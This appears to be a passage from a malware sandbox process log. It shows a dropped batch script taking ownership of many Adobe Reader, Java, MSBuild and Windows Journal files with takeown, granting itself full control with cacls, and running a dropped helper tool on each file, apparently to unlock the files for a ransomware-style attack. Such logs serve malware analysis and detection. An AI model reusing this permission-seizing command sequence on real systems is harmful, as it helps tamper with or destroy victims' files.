C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\dK7VamHD.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\PDFSigQFormalRep.pdf""2⤵
- Loads dropped DLL
PID:1944 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\PDFSigQFormalRep.pdf" /E /G Admin:F /C3⤵PID:604
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\PDFSigQFormalRep.pdf"3⤵
- Modifies file permissions
PID:1488
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c WSBgHpvp.exe -accepteula "PDFSigQFormalRep.pdf" -nobanner3⤵
- Loads dropped DLL
PID:1120 -
C:\Users\Admin\AppData\Local\Temp\WSBgHpvp.exeWSBgHpvp.exe -accepteula "PDFSigQFormalRep.pdf" -nobanner4⤵
- Executes dropped EXE
PID:912
-
-
-
C:\Users\Admin\AppData\Local\Temp\WSBgHpvp.exeWSBgHpvp.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:1132
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\dK7VamHD.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\Dynamic.pdf""2⤵
- Loads dropped DLL
PID:1268 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\Dynamic.pdf" /E /G Admin:F /C3⤵PID:652
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\Dynamic.pdf"3⤵PID:336
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c WSBgHpvp.exe -accepteula "Dynamic.pdf" -nobanner3⤵
- Loads dropped DLL
PID:1036 -
C:\Users\Admin\AppData\Local\Temp\WSBgHpvp.exeWSBgHpvp.exe -accepteula "Dynamic.pdf" -nobanner4⤵
- Executes dropped EXE
PID:268
-
-
-
C:\Users\Admin\AppData\Local\Temp\WSBgHpvp.exeWSBgHpvp.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:1616
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\dK7VamHD.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\IDTemplates\ENU\AdobeID.pdf""2⤵
- Loads dropped DLL
PID:612 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\IDTemplates\ENU\AdobeID.pdf" /E /G Admin:F /C3⤵PID:1752
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\IDTemplates\ENU\AdobeID.pdf"3⤵PID:1796
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c WSBgHpvp.exe -accepteula "AdobeID.pdf" -nobanner3⤵
- Loads dropped DLL
PID:1288 -
C:\Users\Admin\AppData\Local\Temp\WSBgHpvp.exeWSBgHpvp.exe -accepteula "AdobeID.pdf" -nobanner4⤵
- Executes dropped EXE
PID:840
-
-
-
C:\Users\Admin\AppData\Local\Temp\WSBgHpvp.exeWSBgHpvp.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:1188
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\dK7VamHD.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\SignHere.pdf""2⤵
- Loads dropped DLL
PID:1368 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\SignHere.pdf" /E /G Admin:F /C3⤵PID:1500
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\SignHere.pdf"3⤵PID:872
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c WSBgHpvp.exe -accepteula "SignHere.pdf" -nobanner3⤵
- Loads dropped DLL
PID:912 -
C:\Users\Admin\AppData\Local\Temp\WSBgHpvp.exeWSBgHpvp.exe -accepteula "SignHere.pdf" -nobanner4⤵
- Executes dropped EXE
PID:2020
-
-
-
C:\Users\Admin\AppData\Local\Temp\WSBgHpvp.exeWSBgHpvp.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:1416
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\dK7VamHD.bat" "C:\Program Files\Java\jdk1.7.0_80\jre\bin\server\classes.jsa""2⤵
- Loads dropped DLL
PID:1768 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Java\jdk1.7.0_80\jre\bin\server\classes.jsa" /E /G Admin:F /C3⤵PID:820
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Java\jdk1.7.0_80\jre\bin\server\classes.jsa"3⤵
- Modifies file permissions
PID:1312
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c WSBgHpvp.exe -accepteula "classes.jsa" -nobanner3⤵
- Loads dropped DLL
PID:936 -
C:\Users\Admin\AppData\Local\Temp\WSBgHpvp.exeWSBgHpvp.exe -accepteula "classes.jsa" -nobanner4⤵
- Executes dropped EXE
PID:1036
-
-
-
C:\Users\Admin\AppData\Local\Temp\WSBgHpvp.exeWSBgHpvp.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:1616
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\dK7VamHD.bat" "C:\Program Files\Java\jre7\bin\server\classes.jsa""2⤵
- Loads dropped DLL
PID:1428 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Java\jre7\bin\server\classes.jsa" /E /G Admin:F /C3⤵PID:1800
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Java\jre7\bin\server\classes.jsa"3⤵PID:1220
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c WSBgHpvp.exe -accepteula "classes.jsa" -nobanner3⤵
- Loads dropped DLL
PID:1216 -
C:\Users\Admin\AppData\Local\Temp\WSBgHpvp.exeWSBgHpvp.exe -accepteula "classes.jsa" -nobanner4⤵
- Executes dropped EXE
PID:1748
-
-
-
C:\Users\Admin\AppData\Local\Temp\WSBgHpvp.exeWSBgHpvp.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:1188
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\dK7VamHD.bat" "C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\Workflow.VisualBasic.Targets""2⤵
- Loads dropped DLL
PID:1464 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\Workflow.VisualBasic.Targets" /E /G Admin:F /C3⤵PID:1500
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\Workflow.VisualBasic.Targets"3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:1120
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c WSBgHpvp.exe -accepteula "Workflow.VisualBasic.Targets" -nobanner3⤵
- Loads dropped DLL
PID:1640 -
C:\Users\Admin\AppData\Local\Temp\WSBgHpvp.exeWSBgHpvp.exe -accepteula "Workflow.VisualBasic.Targets" -nobanner4⤵
- Executes dropped EXE
PID:912
-
-
-
C:\Users\Admin\AppData\Local\Temp\WSBgHpvp.exeWSBgHpvp.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:1416
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\dK7VamHD.bat" "C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\Workflow.Targets""2⤵
- Loads dropped DLL
PID:1368 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\Workflow.Targets" /E /G Admin:F /C3⤵PID:1860
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\Workflow.Targets"3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:1608
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c WSBgHpvp.exe -accepteula "Workflow.Targets" -nobanner3⤵
- Loads dropped DLL
PID:1036 -
C:\Users\Admin\AppData\Local\Temp\WSBgHpvp.exeWSBgHpvp.exe -accepteula "Workflow.Targets" -nobanner4⤵
- Executes dropped EXE
PID:1832
-
-
-
C:\Users\Admin\AppData\Local\Temp\WSBgHpvp.exeWSBgHpvp.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:1840
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\dK7VamHD.bat" "C:\Program Files\Windows Journal\en-US\jnwmon.dll.mui""2⤵
- Loads dropped DLL
PID:1164 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Windows Journal\en-US\jnwmon.dll.mui" /E /G Admin:F /C3⤵PID:748
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Windows Journal\en-US\jnwmon.dll.mui"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1040
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c WSBgHpvp.exe -accepteula "jnwmon.dll.mui" -nobanner3⤵
- Loads dropped DLL
PID:1216 -
C:\Users\Admin\AppData\Local\Temp\WSBgHpvp.exeWSBgHpvp.exe -accepteula "jnwmon.dll.mui" -nobanner4⤵
- Executes dropped EXE
PID:1460
-
-
-
C:\Users\Admin\AppData\Local\Temp\WSBgHpvp.exeWSBgHpvp.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:1752
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\dK7VamHD.bat" "C:\Program Files\Windows Journal\Templates\Dotted_Line.jtp""2⤵
- Loads dropped DLL
PID:1880 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Windows Journal\Templates\Dotted_Line.jtp" /E /G Admin:F /C3⤵PID:1444
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Windows Journal\Templates\Dotted_Line.jtp"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1992
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c WSBgHpvp.exe -accepteula "Dotted_Line.jtp" -nobanner3⤵
- Loads dropped DLL
PID:2020 -
C:\Users\Admin\AppData\Local\Temp\WSBgHpvp.exeWSBgHpvp.exe -accepteula "Dotted_Line.jtp" -nobanner4⤵
- Executes dropped EXE
PID:544
-
-
-
C:\Users\Admin\AppData\Local\Temp\WSBgHpvp.exeWSBgHpvp.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:1464
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\dK7VamHD.bat" "C:\Program Files\Windows Journal\Templates\Shorthand.jtp""2⤵
- Loads dropped DLL
PID:960 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Windows Journal\Templates\Shorthand.jtp" /E /G Admin:F /C3⤵PID:1580
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Windows Journal\Templates\Shorthand.jtp"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:792
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c WSBgHpvp.exe -accepteula "Shorthand.jtp" -nobanner3⤵
- Loads dropped DLL
PID:1536 -
C:\Users\Admin\AppData\Local\Temp\WSBgHpvp.exeWSBgHpvp.exe -accepteula "Shorthand.jtp" -nobanner4⤵
- Executes dropped EXE
PID:820
-
-
-
C:\Users\Admin\AppData\Local\Temp\WSBgHpvp.exeWSBgHpvp.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:892
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\dK7VamHD.bat" "C:\Program Files\Windows Journal\en-US\JNTFiltr.dll.mui""2⤵
- Loads dropped DLL
PID:748 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Windows Journal\en-US\JNTFiltr.dll.mui" /E /G Admin:F /C3⤵PID:1864
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Windows Journal\en-US\JNTFiltr.dll.mui"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1576
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c WSBgHpvp.exe -accepteula "JNTFiltr.dll.mui" -nobanner3⤵
- Loads dropped DLL
PID:1444 -
C:\Users\Admin\AppData\Local\Temp\WSBgHpvp.exeWSBgHpvp.exe -accepteula "JNTFiltr.dll.mui" -nobanner4⤵
- Executes dropped EXE
PID:1992
-
-
-
C:\Users\Admin\AppData\Local\Temp\WSBgHpvp.exeWSBgHpvp.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:2020
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\dK7VamHD.bat" "C:\Program Files\Windows Journal\PDIALOG.exe""2⤵
- Loads dropped DLL
PID:1848 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Windows Journal\PDIALOG.exe" /E /G Admin:F /C3⤵PID:936
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Windows Journal\PDIALOG.exe"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:652
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c WSBgHpvp.exe -accepteula "PDIALOG.exe" -nobanner3⤵
- Loads dropped DLL
PID:1368 -
C:\Users\Admin\AppData\Local\Temp\WSBgHpvp.exeWSBgHpvp.exe -accepteula "PDIALOG.exe" -nobanner4⤵
- Executes dropped EXE
PID:820
-
-
-
C:\Users\Admin\AppData\Local\Temp\WSBgHpvp.exeWSBgHpvp.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:840
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\dK7VamHD.bat" "C:\Program Files\Windows Journal\Templates\Music.jtp""2⤵
- Loads dropped DLL
PID:1400 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Windows Journal\Templates\Music.jtp" /E /G Admin:F /C3⤵PID:1248
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Windows Journal\Templates\Music.jtp"3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:1864
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c WSBgHpvp.exe -accepteula "Music.jtp" -nobanner3⤵
- Loads dropped DLL
PID:1576 -
C:\Users\Admin\AppData\Local\Temp\WSBgHpvp.exeWSBgHpvp.exe -accepteula "Music.jtp" -nobanner4⤵
- Executes dropped EXE
PID:1500
-
-
-
C:\Users\Admin\AppData\Local\Temp\WSBgHpvp.exeWSBgHpvp.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:324
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\dK7VamHD.bat" "C:\Program Files\Windows Journal\en-US\NBMapTIP.dll.mui""2⤵
- Loads dropped DLL
PID:788 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Windows Journal\en-US\NBMapTIP.dll.mui" /E /G Admin:F /C3⤵PID:1752
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Windows Journal\en-US\NBMapTIP.dll.mui"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:268
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c WSBgHpvp.exe -accepteula "NBMapTIP.dll.mui" -nobanner3⤵
- Loads dropped DLL
PID:544 -
C:\Users\Admin\AppData\Local\Temp\WSBgHpvp.exeWSBgHpvp.exe -accepteula "NBMapTIP.dll.mui" -nobanner4⤵
- Executes dropped EXE
PID:1580
-
-
-
C:\Users\Admin\AppData\Local\Temp\WSBgHpvp.exeWSBgHpvp.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:652
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\dK7VamHD.bat" "C:\Program Files\Windows Journal\Templates\Graph.jtp""2⤵
- Loads dropped DLL
PID:820 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Windows Journal\Templates\Graph.jtp" /E /G Admin:F /C3⤵PID:840
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Windows Journal\Templates\Graph.jtp"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1268
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c WSBgHpvp.exe -accepteula "Graph.jtp" -nobanner3⤵
- Loads dropped DLL
PID:960 -
C:\Users\Admin\AppData\Local\Temp\WSBgHpvp.exeWSBgHpvp.exe -accepteula "Graph.jtp" -nobanner4⤵
- Executes dropped EXE
PID:1796
-
-
-
C:\Users\Admin\AppData\Local\Temp\WSBgHpvp.exeWSBgHpvp.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:1864
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\dK7VamHD.bat" "C:\Program Files\Windows Journal\en-US\PDIALOG.exe.mui""2⤵
- Loads dropped DLL
PID:1500 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Windows Journal\en-US\PDIALOG.exe.mui" /E /G Admin:F /C3⤵PID:324
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Windows Journal\en-US\PDIALOG.exe.mui"3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:1312
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c WSBgHpvp.exe -accepteula "PDIALOG.exe.mui" -nobanner3⤵
- Loads dropped DLL
PID:1460 -
C:\Users\Admin\AppData\Local\Temp\WSBgHpvp.exeWSBgHpvp.exe -accepteula "PDIALOG.exe.mui" -nobanner4⤵
- Executes dropped EXE
PID:612
-
-
-
C:\Users\Admin\AppData\Local\Temp\WSBgHpvp.exeWSBgHpvp.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:268
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\dK7VamHD.bat" "C:\Program Files\Windows Journal\Templates\Memo.jtp""2⤵
- Loads dropped DLL
PID:1032 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Windows Journal\Templates\Memo.jtp" /E /G Admin:F /C3⤵PID:940
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Windows Journal\Templates\Memo.jtp"3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:788
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c WSBgHpvp.exe -accepteula "Memo.jtp" -nobanner3⤵
- Loads dropped DLL
PID:1220 -
C:\Users\Admin\AppData\Local\Temp\WSBgHpvp.exeWSBgHpvp.exe -accepteula "Memo.jtp" -nobanner4⤵
- Executes dropped EXE
PID:1848
-
-
-
C:\Users\Admin\AppData\Local\Temp\WSBgHpvp.exeWSBgHpvp.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:1268
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\dK7VamHD.bat" "C:\Program Files\Windows Photo Viewer\en-US\PhotoAcq.dll.mui""2⤵
- Loads dropped DLL
PID:1248 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Windows Photo Viewer\en-US\PhotoAcq.dll.mui" /E /G Admin:F /C3⤵PID:1864
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Windows Photo Viewer\en-US\PhotoAcq.dll.mui"3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:1720
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c WSBgHpvp.exe -accepteula "PhotoAcq.dll.mui" -nobanner3⤵
- Loads dropped DLL
PID:1444 -
C:\Users\Admin\AppData\Local\Temp\WSBgHpvp.exeWSBgHpvp.exe -accepteula "PhotoAcq.dll.mui" -nobanner4⤵
- Executes dropped EXE
PID:1816
-
-
-
C:\Users\Admin\AppData\Local\Temp\WSBgHpvp.exeWSBgHpvp.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:1312
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\dK7VamHD.bat" "C:\Program Files\Windows Journal\en-US\MSPVWCTL.DLL.mui""2⤵
- Loads dropped DLL
PID:604 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Windows Journal\en-US\MSPVWCTL.DLL.mui" /E /G Admin:F /C3⤵PID:268
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Windows Journal\en-US\MSPVWCTL.DLL.mui"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1992
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c WSBgHpvp.exe -accepteula "MSPVWCTL.DLL.mui" -nobanner3⤵
- Loads dropped DLL
PID:936 -
C:\Users\Admin\AppData\Local\Temp\WSBgHpvp.exeWSBgHpvp.exe -accepteula "MSPVWCTL.DLL.mui" -nobanner4⤵
- Executes dropped EXE
PID:652
-
-
-
C:\Users\Admin\AppData\Local\Temp\WSBgHpvp.exeWSBgHpvp.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:788
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\dK7VamHD.bat" "C:\Program Files\Windows Journal\Templates\Genko_2.jtp""2⤵
- Loads dropped DLL
PID:1848 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Windows Journal\Templates\Genko_2.jtp" /E /G Admin:F /C3⤵PID:1268
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Windows Journal\Templates\Genko_2.jtp"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1196
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c WSBgHpvp.exe -accepteula "Genko_2.jtp" -nobanner3⤵
- Loads dropped DLL
PID:1536 -
C:\Users\Admin\AppData\Local\Temp\WSBgHpvp.exeWSBgHpvp.exe -accepteula "Genko_2.jtp" -nobanner4⤵
- Executes dropped EXE
PID:1400
-
-
-
C:\Users\Admin\AppData\Local\Temp\WSBgHpvp.exeWSBgHpvp.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:1640
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\dK7VamHD.bat" "C:\Program Files\Windows Journal\en-US\jnwdui.dll.mui""2⤵
- Loads dropped DLL
PID:1164 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Windows Journal\en-US\jnwdui.dll.mui" /E /G Admin:F /C3⤵PID:1064
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Windows Journal\en-US\jnwdui.dll.mui"3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:1992
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c WSBgHpvp.exe -accepteula "jnwdui.dll.mui" -nobanner3⤵
- Loads dropped DLL
PID:932 -
C:\Users\Admin\AppData\Local\Temp\WSBgHpvp.exeWSBgHpvp.exe -accepteula "jnwdui.dll.mui" -nobanner4⤵
- Executes dropped EXE
PID:748
-
-
-
C:\Users\Admin\AppData\Local\Temp\WSBgHpvp.exeWSBgHpvp.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:1880
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\dK7VamHD.bat" "C:\Program Files\Windows Journal\Journal.exe""2⤵
- Loads dropped DLL
PID:1608 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Windows Journal\Journal.exe" /E /G Admin:F /C3⤵PID:1268
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Windows Journal\Journal.exe"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1864
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c WSBgHpvp.exe -accepteula "Journal.exe" -nobanner3⤵
- Loads dropped DLL
PID:1748 -
C:\Users\Admin\AppData\Local\Temp\WSBgHpvp.exeWSBgHpvp.exe -accepteula "Journal.exe" -nobanner4⤵
- Executes dropped EXE
PID:1400
-
-
-
C:\Users\Admin\AppData\Local\Temp\WSBgHpvp.exeWSBgHpvp.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:1816
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\dK7VamHD.bat" "C:\Program Files\Windows Journal\Templates\Month_Calendar.jtp""2⤵
- Loads dropped DLL
PID:1640 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Windows Journal\Templates\Month_Calendar.jtp" /E /G Admin:F /C3⤵PID:612
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Windows Journal\Templates\Month_Calendar.jtp"3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:1064
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c WSBgHpvp.exe -accepteula "Month_Calendar.jtp" -nobanner3⤵
- Loads dropped DLL
PID:1992 -
C:\Users\Admin\AppData\Local\Temp\WSBgHpvp.exeWSBgHpvp.exe -accepteula "Month_Calendar.jtp" -nobanner4⤵
- Executes dropped EXE
PID:892
-
-
-
C:\Users\Admin\AppData\Local\Temp\WSBgHpvp.exeWSBgHpvp.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:840
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\dK7VamHD.bat" "C:\Program Files\Windows Journal\Templates\blank.jtp""2⤵
- Loads dropped DLL
PID:1880 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Windows Journal\Templates\blank.jtp" /E /G Admin:F /C3⤵PID:708
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Windows Journal\Templates\blank.jtp"3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:1268
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c WSBgHpvp.exe -accepteula "blank.jtp" -nobanner3⤵
- Loads dropped DLL
PID:1864 -
C:\Users\Admin\AppData\Local\Temp\WSBgHpvp.exeWSBgHpvp.exe -accepteula "blank.jtp" -nobanner4⤵
- Executes dropped EXE
PID:1464
-
-
-
C:\Users\Admin\AppData\Local\Temp\WSBgHpvp.exeWSBgHpvp.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:1752
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\dK7VamHD.bat" "C:\Program Files\Windows Journal\Templates\Seyes.jtp""2⤵
- Loads dropped DLL
PID:1580 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Windows Journal\Templates\Seyes.jtp" /E /G Admin:F /C3⤵PID:1500
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Windows Journal\Templates\Seyes.jtp"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:520
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c WSBgHpvp.exe -accepteula "Seyes.jtp" -nobanner3⤵
- Loads dropped DLL
PID:1724 -
C:\Users\Admin\AppData\Local\Temp\WSBgHpvp.exeWSBgHpvp.exe -accepteula "Seyes.jtp" -nobanner4⤵
- Executes dropped EXE
PID:936
-
-
-
C:\Users\Admin\AppData\Local\Temp\WSBgHpvp.exeWSBgHpvp.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:1440
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\dK7VamHD.bat" "C:\Program Files\Windows Photo Viewer\en-US\ImagingDevices.exe.mui""2⤵
- Loads dropped DLL
PID:432 -
